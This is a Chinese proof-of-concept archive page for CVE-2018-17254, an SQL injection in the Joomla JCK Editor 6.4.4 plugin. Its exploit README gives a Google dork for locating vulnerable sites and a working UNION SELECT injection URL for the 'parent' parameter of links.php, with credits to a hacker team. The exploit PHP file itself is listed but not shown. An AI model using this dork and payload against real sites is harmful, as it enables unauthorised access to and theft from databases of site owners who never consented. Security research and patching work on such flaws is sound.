目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2018-17254 PoC — Joomla! JCK Editor组件SQL注入漏洞

来源
关联漏洞
标题:Joomla! JCK Editor组件SQL注入漏洞 (CVE-2018-17254)
Description:Joomla!是美国Open Source Matters团队开发的一套开源的内容管理系统(CMS),该系统提供RSS馈送、网站搜索等功能。JCK Editor是其中的一个编辑器组件。 Joomla! JCK Editor组件6.4.4版本中存在SQL注入漏洞。远程攻击者可通过向jtreelink/dialogs/links.php页面发送‘parent’参数利用该漏洞执行SQL命令。
Description
Joomla JCK Editor 6.4.4 - 'parent' SQL Injection
介绍
# CVE-2018-17254


![](https://media.tenor.com/xjIYN3WkB4wAAAAC/smile-person-akirambow.gif)

<pre>
# Exploit Title: Joomla JCK Editor 6.4.4 - 'parent' SQL Injection>
# Googke Dork: inurl:/plugins/editors/jckeditor/plugins/jtreelink/
# Vendor Homepage: http://docs.arkextensions.com/downloads/jck-editor
# Version: 6.4.4
# Tested on: Debian 10 Ubuntu Windows 11/10
# CVE : CVE-2018-17254
# PHP version (exploit): 7.3.27
# POC: /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20aa

Preference : https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254</pre>
Greettzz LXPLOIT - CUKIMAY CYBER TEAM
My Friends : Noniod7 - Ardzz
Recoded from : Hamza Megahed
https://www.bloglumajangteamsec.my.id/2023/01/cve-2018-17254-eksploitasi.html
文件快照

[4.0K] /data/pocs/e13bd93d822af7d188178cc7ec8f902f96bebe0d ├── [ 12K] CVE-2018-17254.php └── [ 846] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。